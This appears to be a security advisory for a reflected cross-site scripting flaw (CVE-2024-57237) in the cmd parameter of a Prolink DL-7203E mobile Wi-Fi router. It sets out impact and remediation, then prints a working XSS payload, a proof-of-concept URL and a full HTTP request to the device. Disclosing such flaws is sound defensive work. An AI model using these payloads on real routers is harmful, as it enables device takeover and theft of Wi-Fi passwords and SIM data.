4G LTE Mobile Wi-Fi DL7203E Unauthenticated Reflected Cross Site Scripting (CVE-2024-57237)
An XSS (Cross-Site Scripting) vulnerability exists in the /reqproc/proc_get endpoint
An XSS (Cross-Site Scripting) vulnerability exists in the /reqproc/proc_get
endpoint. The vulnerability arises because the cmd parameter does not properly sanitize input and the response is served with a Content-Type
of text/html
. This behavior allows the browser to execute injected JavaScript code.
Affected Components:
Product Model: 4G LTE Mobile Wi-Fi DL-7203E
Model Number: DL-7203E
Software Version: DL-7203E_V4.0.0B05_240423
Hardware Version: V2.0
Product: https://prolink2u.com/products/dl-7203e-b
Impact
Unauthenticated exploitation could allow an attacker to reboot the device or perform unauthorized actions like changing Wi-Fi passwords via CSRF attacks.
Sensitive user data (such as WIFI password, SIM Info, IMEI) could be stolen.
Remediation
Update the API to return a Content-Type of application/json to ensure that responses are not interpreted as executable HTML or JavaScript.
Payload
<img src=x onerror=alert(document.domain)>
Proof of Concept
/reqproc/proc_get?multi_data=1&isTest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&_=1733067440765
HTTP Request
GET /reqproc/proc_get?multi_data=1&isTest=false&sms_received_flag_flag=0&sts_received_flag_flag=0&cmd=<img%20src=x%20onerror=alert(document.domain)>&_=1733067440765 HTTP/1.1 Host: 192.168.15.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Connection: keep-alive Referer: http://192.168.15.1/index.html